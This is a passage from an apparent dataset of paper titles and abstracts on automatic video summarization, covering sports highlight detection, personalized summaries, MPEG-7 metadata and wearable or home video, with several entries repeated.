developed a novel system for baseball video event detection and summarization using superimposed caption text detection and recognition. The system detects different types of semantic level events in baseball video including scoring and last pitch of each batter. The system has two components: event detection and event boundary detection. Event detection is realized by change detection and recognition of game stat texts (such as text information showing in score box). Event boundary detection is achieved using our previously developed algorithm, which detects the pitch view as the event beginning and nonactive view as potential endings of the event. One unique contribution of the system is its capability to accurately detect the semantic level events by combining video text recognition with camera view recognition. Another unique feature is the real-time processing speed by taking advantage of compressed-domain approaches in part of the algorithms such as caption detection. To the best of our knowledge, this is the first system achieving accurate detection of multiple types of high-level semantic events in baseball videos. --- paper_title: An approach to generating two-level video abstraction paper_content: Video abstraction is a short summary of the content of a longer video document. Most existing video abstraction methods are based on shot-level, which is not sufficient to meaningful browsing and is too fine to users sometimes. In this paper, we propose a novel approach of generating video abstraction at two levels, namely, the shot-level and the scene-level. We put up a method of extracting key frames from shots, according to the content variation of the latter. An updated time-adaptive algorithm is used to group the shots into scene and representative frames are extracted in the region of that scene using the method of generating Minimum Spanning Tree. Key frames and representative frames can represent the content of shots and scenes, respectively. The organized sequences of key frames and representative frames are the two-level video abstraction. Experiments based on real-world movies show that the method above can provide users with better video summary at different levels. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: The CPR model for summarizing video paper_content: Most past work on video summarization has been based on selecting key frames from videos. We propose a model of video summarization based on three important parameters: Priority (of frames), Continuity (of the summary), and non-Repetition (of the summary). In short, a summary must include high priority frames, must be continuous and non-repetitive. An optimal summary is one that maximizes an objective function based on these three parameters. We develop formal definitions of all these concepts and provide algorithms to find optimal summaries. We briefly report on the performance of these algorithms. --- paper_title: Framework for personalized multimedia summarization paper_content: We extend and validate methods of personalization to the domain of automatically created multimedia summaries. Based on a previously performed user study of 59 people we derived a mapping of personality profile information to preferred multimedia features. This article describes our summarization algorithm. We define constraints for automatic summary generation. Summaries should consist of contiguous segments of full shots, with duration proportional to the log of video length, selected by an objective function of total "importance" of features, with heuristic rules for deciding the "best" combination of length and importance. We validated the summaries with a user study of 32 people. They were asked to answer a shortened series of personality queries. Using this current user profile, together with the earlier genre-specific reduced mapping and with automatically derived features, we automatically generated two summaries for each video: one optimally matched, and one matched to the "opposite" personality. Each user evaluated both summaries on a preference scale for four each of: news, talk show, and music videos. From a statistical analysis we find statistically significant evidence of the effectiveness of personalization on news and music videos, with no evidence of user subpopulations. We conclude for these genres that our claim, of a universal mapping from certain measured personality traits to the computable creation of preferred multimedia summaries, is supported. --- paper_title: Efficient access to video content in a unified framework paper_content: Book contents' browsing and retrieval have been greatly facilitated by its Table-of-Contents (ToC) and Index, respectively. Unfortunately, today's video lacks such powerful mechanisms. In this paper, we explore and present novel techniques for constructing video ToC and Index. Furthermore, we explore the relationship between video browsing and retrieval and propose a unified framework: to incorporate both entities in a seamless way. Experimental results on real-world video clips justify our proposed framework for providing efficient access to video content. --- paper_title: Video Summarization for Large Sports Video Archives paper_content: Video summarization is defined as creating a shorter video clip or a video poster which includes only the important scenes in the original video streams. In this paper, we propose two methods of generating a summary of arbitrary length for large sports video archives. One is to create a concise video clip by temporally compressing the amount of the video data. The other is to provide a video poster by spatially presenting the image keyframes which together represent the whole video content. Our methods deal with the metadata which has semantic descriptions of video content. Summaries are created according to the significance of each video segment which is normalized in order to handle large sports video archives. We experimentally verified the effectiveness of our methods by comparing the results with man-made video summaries --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Automatically extracting highlights for TV Baseball programs paper_content: In today's fast-paced world, while the number of channels of television programming available is increasing rapidly, the time available to watch them remains the same or is decreasing. Users desire the capability to watch the programs time-shifted (on-demand) and/or to watch just the highlights to save time. In this paper we explore how to provide for the latter capability, that is the ability to extract highlights automatically, so that viewing time can be reduced. We focus on the sport of baseball as our initial target—it is a very popular sport, the whole game is quite long, and the exciting portions are few. We focus on detecting highlights using audio-track features alone without relying on expensive-to-compute video-track features. We use a combination of generic sports features and baseball-specific features to obtain our results, but believe that may other sports offer the same opportunity and that the techniques presented here will apply to those sports. We present details on relative performance of various learning algorithms, and a probabilistic framework for combining multiple sources of information. We present results comparing output of our algorithms against human-selected highlights for a diverse collection of baseball games with very encouraging results. --- paper_title: Sequential association mining for video summarization paper_content: In this paper, we propose an association-based video summarization scheme that mines sequential associations from video data for summary creation. Given detected shots of video V, we first cluster them into visually distinct groups, and then construct a sequential sequence by integrating the temporal order and cluster type of each shot. An association mining scheme is designed to mine sequentially associated clusters from the sequence, and these clusters are selected as summary candidates. With a user specified summary length, our system generates the corresponding summary by selecting representative frames from candidate clusters and assembling them by their original temporal order. The experimental evaluation demonstrates the effectiveness of our summarization method. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: VSUM: summarizing from videos paper_content: Summarization on produced type of video data (like news or movies) is to find important segments that contain rich information. Users could obtain the important messages by reading summaries rather than full documents. The research in this area could be divided into two parts: (I) image processing (IP) perspective, and (2) NLP (nature language processing) perspective. The former put emphasis on the detection of key frames, while the later focused on the extraction of important concepts. This paper proposes a video summarization system, VSUM. VSUM first identifies all caption words, and then adopts a technique to find the important segments. An external thesaurus is also used in VSUM to enhance the summary extraction process. The experimental results show that VSUM could perform well even if the accuracy of OCR (optical character recognition) is not sophisticating. --- paper_title: Video summarization and scene detection by graph modeling paper_content: We propose a unified approach for video summarization based on the analysis of video structures and video highlights. Two major components in our approach are scene modeling and highlight detection. Scene modeling is achieved by normalized cut algorithm and temporal graph analysis, while highlight detection is accomplished by motion attention modeling. In our proposed approach, a video is represented as a complete undirected graph and the normalized cut algorithm is carried out to globally and optimally partition the graph into video clusters. The resulting clusters form a directed temporal graph and a shortest path algorithm is proposed to efficiently detect video scenes. The attention values are then computed and attached to the scenes, clusters, shots, and subshots in a temporal graph. As a result, the temporal graph can inherently describe the evolution and perceptual importance of a video. In our application, video summaries that emphasize both content balance and perceptual quality can be generated directly from a temporal graph that embeds both the structure and attention information. --- paper_title: Low cost soccer video summaries based on visual rhythm paper_content: The visual rhythm is a spatio-temporal sampled representation of video data providing compact information while preserving several types of video events.We exploit these properties in the present work to propose two new low level descriptors for the analysis of soccer videos computed directly from the visual rhythm.The descriptors are related to dominant color and camera motion estimation.The new descriptors are applied in different tasks aiming the analysis of soccer videos such as shot transition detection, shot classification and attack direction estimation.We also present a simple automated soccer summary application to illustrate the use of the new descriptors. --- paper_title: Learning personalized video highlights from detailed MPEG-7 metadata paper_content: We present a new framework for generating personalized video digests from detailed event metadata. In the new approach high level semantic features (e.g., number of offensive events) are extracted from an existing metadata signal using time windows (e.g., features within 16 sec. intervals). Personalized video digests are generated using a supervised learning algorithm which takes as input examples of important/unimportant events. Window-based features are extracted from the metadata and used to train the system and build a classifier that, given metadata for a new video, classifies segments into important and unimportant, according to a specific user, to generate personalized video digests. Our experimental results using soccer video suggest that extracting high level semantic information from existing metadata can be used effectively (80% precision and 85% recall using cross validation) in generating personalized video digests. --- paper_title: Video summarization based on the psychological unfolding of a drama paper_content: This paper proposes a method of composing digests of TV videos based on their psychological unfolding. Most of the studies of video summarization to date have been based on the video structure, such as cuts or objects in the video. It is generally considered, however, that the observer of a TV drama emphasizes instead the psychological unfolding of the video content (such as the climax). However, no method of summarizing a drama based on the psychological aspect of the video has been proposed. Track structures [such as cutting, lines spoken by the actors, BGM (background music), and sound effects] constitute physical components, and the dramatist skillfully manipulates the time structure based on his empirical knowledge in order to present a particular psychological impression. This paper proposes a method in which the psychologically important part is detected on the basis of empirical knowledge as a corresponding time-series pattern of the track structure, and a summarized video is generated. As an experiment, the proposed method was applied to a TV drama, and the time length was reduced to approximately 1/14. Subjective evaluation experiments show that the proposed method preserves the content of the main plot, with naturalness of extraction, thus indicating the usefulness of the proposed method. © 2002 Wiley Periodicals, Inc. Syst Comp Jpn, 33(11): 39–49, 2002; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/scj.10066 --- paper_title: The holy grail of content-based media analysis paper_content: Tools and systems for content-based access to multimedia and-image., video, audio, graphics, text, and any number of combinations-has increased in the last decade. We've seen a common theme of developing automatic analysis techniques for deriving metadata (data describing information in the content at both syntactic and semantic levels). Such metadata facilitates developing innovative tools and systems for multimedia information retrieval, summarization, delivery, and manipulation. Many interesting demonstrations of potential applications and services have emerged-finding images visually similar to a chosen picture (or sketch); summarizing videos with thumbnails of keyframes; finding video clips of a specific event, story, or person; and producing a two-minute skim of an hour-long program. In order to evaluate content-based research methodologies, the article considers intended users and whether alternative solutions exist and areas of research. --- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks. Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while the high-level knowledge such as common sense and human perceptual knowledge are encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: MINMAX optimal video summarization paper_content: The need for video summarization originates primarily from a viewing time constraint. A shorter version of the original video sequence is desirable in a number of applications. Clearly, a shorter version is also necessary in applications where storage, communication bandwidth and/or power are limited. In this paper, our work is based on a MINMAX optimization formulation with viewing time, frame skip and bit rate constraints. New metrics for missing frame and video summary distortions are introduced. Optimal algorithm based on dynamic programming is presented along with experimental results. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100p recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: From context to content: leveraging context to infer media metadata paper_content: The recent popularity of mobile camera phones allows for new opportunities to gather important metadata at the point of capture. This paper describes a method for generating metadata for photos using spatial, temporal, and social context. We describe a system we implemented for inferring location information for pictures taken with camera phones and its performance evaluation. We propose that leveraging contextual metadata at the point of capture can address the problems of the semantic and sensory gaps. In particular, combining and sharing spatial, temporal, and social contextual metadata from a given user and across users allows us to make inferences about media content. --- paper_title: Context and memory in multimedia content analysis paper_content: With the advent of broadband networking, video will be available online as well as through traditional distribution channels. The merging of entertainment and information media makes video content classification and retrieval a necessary tool. To provide fast retrieval, content management systems must discern between categories of video. Automatic multimedia analysis techniques for deriving high-level descriptions and annotations have experienced a tremendous surge in interest. Academia and industry have also been challenged to develop realistic applications-from home media library organizers and multimedia lecture archives to broadcast TV content navigators and video-on-demand-in pursuit of the killer application. Current content classification technologies have undoubtedly emerged from traditional image processing and computer vision, audio analysis and processing, and information retrieval. Although terminology varies, the algorithms generally fall into three categories: tangible detectors, high-level abstractors, and latent or intangible descriptors. This paper presents the reflections of the work done by the author and the work ahead. --- paper_title: Video summarization: methods and landscape paper_content: The ability to summarize and abstract information will be an essential part of intelligent behavior in consumer devices. Various summarization methods have been the topic of intensive research in the content-based video analysis community. Summarization in traditional information retrieval is a well understood problem. While there has been a lot of research in the multimedia community there is no agreed upon terminology and classification of the problems in this domain. Although the problem has been researched from different aspects there is usually no distinction between the various dimensions of summarization. The goal of the paper is to provide the basic definitions of widely used terms such as skimming, summarization, and highlighting. The different levels of summarization: local, global, and meta-level are made explicit. We distinguish among the dimensions of task, content, and method and provide an extensive classification model for the same. We map the existing summary extraction approaches in the literature into this model and we classify the aspects of proposed systems in the literature. In addition, we outline the evaluation methods and provide a brief survey. Finally we propose future research directions based on the white spots that we identified by analysis of existing systems in the literature. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Video Summarization for Large Sports Video Archives paper_content: Video summarization is defined as creating a shorter video clip or a video poster which includes only the important scenes in the original video streams. In this paper, we propose two methods of generating a summary of arbitrary length for large sports video archives. One is to create a concise video clip by temporally compressing the amount of the video data. The other is to provide a video poster by spatially presenting the image keyframes which together represent the whole video content. Our methods deal with the metadata which has semantic descriptions of video content. Summaries are created according to the significance of each video segment which is normalized in order to handle large sports video archives. We experimentally verified the effectiveness of our methods by comparing the results with man-made video summaries --- paper_title: Learning personalized video highlights from detailed MPEG-7 metadata paper_content: We present a new framework for generating personalized video digests from detailed event metadata. In the new approach high level semantic features (e.g., number of offensive events) are extracted from an existing metadata signal using time windows (e.g., features within 16 sec. intervals). Personalized video digests are generated using a supervised learning algorithm which takes as input examples of important/unimportant events. Window-based features are extracted from the metadata and used to train the system and build a classifier that, given metadata for a new video, classifies segments into important and unimportant, according to a specific user, to generate personalized video digests. Our experimental results using soccer video suggest that extracting high level semantic information from existing metadata can be used effectively (80% precision and 85% recall using cross validation) in generating personalized video digests. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Video Summarization for Large Sports Video Archives paper_content: Video summarization is defined as creating a shorter video clip or a video poster which includes only the important scenes in the original video streams. In this paper, we propose two methods of generating a summary of arbitrary length for large sports video archives. One is to create a concise video clip by temporally compressing the amount of the video data. The other is to provide a video poster by spatially presenting the image keyframes which together represent the whole video content. Our methods deal with the metadata which has semantic descriptions of video content. Summaries are created according to the significance of each video segment which is normalized in order to handle large sports video archives. We experimentally verified the effectiveness of our methods by comparing the results with man-made video summaries --- paper_title: Learning personalized video highlights from detailed MPEG-7 metadata paper_content: We present a new framework for generating personalized video digests from detailed event metadata. In the new approach high level semantic features (e.g., number of offensive events) are extracted from an existing metadata signal using time windows (e.g., features within 16 sec. intervals). Personalized video digests are generated using a supervised learning algorithm which takes as input examples of important/unimportant events. Window-based features are extracted from the metadata and used to train the system and build a classifier that, given metadata for a new video, classifies segments into important and unimportant, according to a specific user, to generate personalized video digests. Our experimental results using soccer video suggest that extracting high level semantic information from existing metadata can be used effectively (80% precision and 85% recall using cross validation) in generating personalized video digests. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stabilities of the system. --- paper_title: Semantic video summarization in compressed domain MPEG video paper_content: In this paper, we present a semantic summarization algorithm that interfaces with the metadata and that works in compressed domain, in particular MPEG-1 and MPEG-2 videos. In enabling a summarization algorithm through high-level semantic content, we try to address two major problems. First, we present the facility provided in the DVA system that allows the semi-automatic creation of this metadata. Second, we address the main point of this system which is the utilization of this metadata to filter out frames, creating an abstract of a video summary quality survey indicates that the proposed method performs satisfactorily. --- paper_title: Personalized abstraction of broadcasted American football video by highlight selection paper_content: Video abstraction is defined as creating shorter video clips or video posters from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted American football video. We first detect significant events in the video stream by matching textual overlays appearing in an image frame with the descriptions of gamestats in which highlights of the game are described. Then, we select highlight shots which should be included in the video abstract from those detected events reflecting on their significance degree and personal preferences, and generate a video clip by connecting the shots augmented with related audio and text. An hour-length video can be compressed into a minute-length personalized abstract. We experimentally verified the effectiveness of this method by comparing man-made video abstracts. --- paper_title: Automatic video summarizing tool using MPEG-7 descriptors for personal video recorder paper_content: We introduce an automatic video summarizing tool (AVST) for a personal video recorder. The tool utilizes MPEG-7 visual descriptors to generate a video index for a summary. The resulting index generates not only a preview of a movie but also allows non-linear access with thumbnails. In addition, the index supports the searching of shots similar to a desired one within saved video sequences. Moreover, simple shot-based video editing can readily be achieved using the generated index. --- paper_title: Personalized video summary using visual semantic annotations and automatic speech transcriptions paper_content: A personalized video summary is dynamically generated in our video personalization and summary system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. The process includes the shot-to-sentence alignment, summary segment selection, and user preference matching and propagation. As a result, the relevant visual shot and audio sentence segments are aggregated and composed into a personalized video summary. --- paper_title: Media content and type selection from always-on wearable video paper_content: A system is described for summarizing head-mounted or hand-carried "always-on" video. The example used is a tourist walking around a historic city with friends and family. The summary consists of a mixture of stills, panoramas and video clips. The system identifies both the scenes to appear in the summary and the media type used to represent them. As there are few shot boundaries in this class of video, the decisions are based on the system's classification of the user's behaviour demonstrated by the motion of the camera, and motion in the scene. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: Design and evaluation of a music video summarization system paper_content: We present a system that summarizes the textual, audio, and video information of music videos in a format tuned to the preferences of a focus group of 20 users. First, we analyzed user-needs for the content and the layout of the music summaries. Then, we designed algorithms that segment individual song videos from full music video programs by noting changes in color palette, transcript, and audio classification. We summarize each song with automatically selected high level information such as title, artist, duration, title frame, and text as well as audio and visual segments of the chorus. Our system automatically determines with high recall and precision chorus locations, from the placement of repeated words and phrases in the text of the song's lyrics. Our Bayesian belief network then selects other significant video and audio content from the multiple media. Overall, we are able to compress content by a factor of 10. Our second user study has identified the principal variations between users in their choices of content desired in the summary, and in their choices of the platforms that should support their viewing. --- paper_title: Auto-summarization of audio-video presentations paper_content: As streaming audio-video technology becomes widespread, there is a dramatic increase in the amount of multimedia content available on the net. Users face a new challenge: How to examine large amounts of multimedia content quickly. One technique that can enable quick overview of multimedia is video summaries; that is, a shorter version assembled by picking important segments from the original. We evaluate three techniques for automatic creation of summaries for online audio-video presentations. These techniques exploit information in the audio signal (e.g., pitch and pause information), knowledge of slide transition points in the presentation, and information about access patterns of previous users. We report a user study that compares automatically generated summaries that are 20%-25% the length of full presentations to author generated summaries. Users learn from the computer-generated summaries, although less than from authors' summaries. They initially find computer-generated summaries less coherent, but quickly grow accustomed to them. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Dynamic video summarization of home video paper_content: An increasing number of people own and use camcorders to make videos that capture their experiences and document their lives. These videos easily add up to many hours of material. Oddly, most of them are put into a storage box and never touched or watched again. The reasons for this are manifold. Firstly, the raw video material is unedited, and is therefore long-winded and lacking visually appealing effects. Video editing would help, but, it is still too time-consuming; people rarely find the time to do it. Secondly, watching the same tape more than a few times can be boring, since the video lacks any variation or surprise during playback. Automatic video abstracting algorithms can provide a method for processing videos so that users will want to play the material more often. However, existing automatic abstracting algorithms have been designed for feature films, newscasts or documentaries, and thus are inappropriate for home video material and raw video footage in general. In this paper, we present new algorithms for generating amusing, visually appealing and variable video abstracts of home video material automatically. They make use of a new, empirically motivated approach, also presented in the paper, to cluster time-stamped shots hierarchically into meaningful units. Last but not least, we propose a simple and natural extension of the way people acquire video - so-called on-the-fly annotations - which will allow a completely new set of applications on raw video footage as well as enable better and more selective automatic video abstracts. Moreover, our algorithms are not restricted to home video but can also be applied to raw video footage in general. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: VideoQA: question answering on news video paper_content: When querying a news video archive, the users are interested in retrieving precise answers in the form of a summary that best answers the query. However, current video retrieval systems, including the search engines on the web, are designed to retrieve documents instead of precise answers. This research explores the use of question answering (QA) techniques to support personalized news video retrieval. Users interact with our system, VideoQA, using short natural language questions with implicit constraints on contents, context, duration, and genre of expected videos. VideoQA returns short precise news video summaries as answers. The main contributions of this research are: (a) the extension of QA technology to support QA in news video; and (b) the use of multi-modal features, including visual, audio, textual, and external resources, to help correct speech recognition errors and to perform precise question answering. The system has been tested on 7 days of news video and has been found to be effective. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: The CPR model for summarizing video paper_content: Most past work on video summarization has been based on selecting key frames from videos. We propose a model of video summarization based on three important parameters: Priority (of frames), Continuity (of the summary), and non-Repetition (of the summary). In short, a summary must include high priority frames, must be continuous and non-repetitive. An optimal summary is one that maximizes an objective function based on these three parameters. We develop formal definitions of all these concepts and provide algorithms to find optimal summaries. We briefly report on the performance of these algorithms. --- paper_title: Framework for personalized multimedia summarization paper_content: We extend and validate methods of personalization to the domain of automatically created multimedia summaries. Based on a previously performed user study of 59 people we derived a mapping of personality profile information to preferred multimedia features. This article describes our summarization algorithm. We define constraints for automatic summary generation. Summaries should consist of contiguous segments of full shots, with duration proportional to the log of video length, selected by an objective function of total "importance" of features, with heuristic rules for deciding the "best" combination of length and importance. We validated the summaries with a user study of 32 people. They were asked to answer a shortened series of personality queries. Using this current user profile, together with the earlier genre-specific reduced mapping and with automatically derived features, we automatically generated two summaries for each video: one optimally matched, and one matched to the "opposite" personality. Each user evaluated both summaries on a preference scale for four each of: news, talk show, and music videos. From a statistical analysis we find statistically significant evidence of the effectiveness of personalization on news and music videos, with no evidence of user subpopulations. We conclude for these genres that our claim, of a universal mapping from certain measured personality traits to the computable creation of preferred multimedia summaries, is supported. --- paper_title: Efficient access to video content in a unified framework paper_content: Book contents' browsing and retrieval have been greatly facilitated by its Table-of-Contents (ToC) and Index, respectively. Unfortunately, today's video lacks such powerful mechanisms. In this paper, we explore and present novel techniques for constructing video ToC and Index. Furthermore, we explore the relationship between video browsing and retrieval and propose a unified framework: to incorporate both entities in a seamless way. Experimental results on real-world video clips justify our proposed framework for providing efficient access to video content. --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Video summarization based on the psychological unfolding of a drama paper_content: This paper proposes a method of composing digests of TV videos based on their psychological unfolding. Most of the studies of video summarization to date have been based on the video structure, such as cuts or objects in the video. It is generally considered, however, that the observer of a TV drama emphasizes instead the psychological unfolding of the video content (such as the climax). However, no method of summarizing a drama based on the psychological aspect of the video has been proposed. Track structures [such as cutting, lines spoken by the actors, BGM (background music), and sound effects] constitute physical components, and the dramatist skillfully manipulates the time structure based on his empirical knowledge in order to present a particular psychological impression. This paper proposes a method in which the psychologically important part is detected on the basis of empirical knowledge as a corresponding time-series pattern of the track structure, and a summarized video is generated. As an experiment, the proposed method was applied to a TV drama, and the time length was reduced to approximately 1/14. Subjective evaluation experiments show that the proposed method preserves the content of the main plot, with naturalness of extraction, thus indicating the usefulness of the proposed method. © 2002 Wiley Periodicals, Inc. Syst Comp Jpn, 33(11): 39–49, 2002; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/scj.10066 --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stabilities of the system. --- paper_title: Semantic video summarization in compressed domain MPEG video paper_content: In this paper, we present a semantic summarization algorithm that 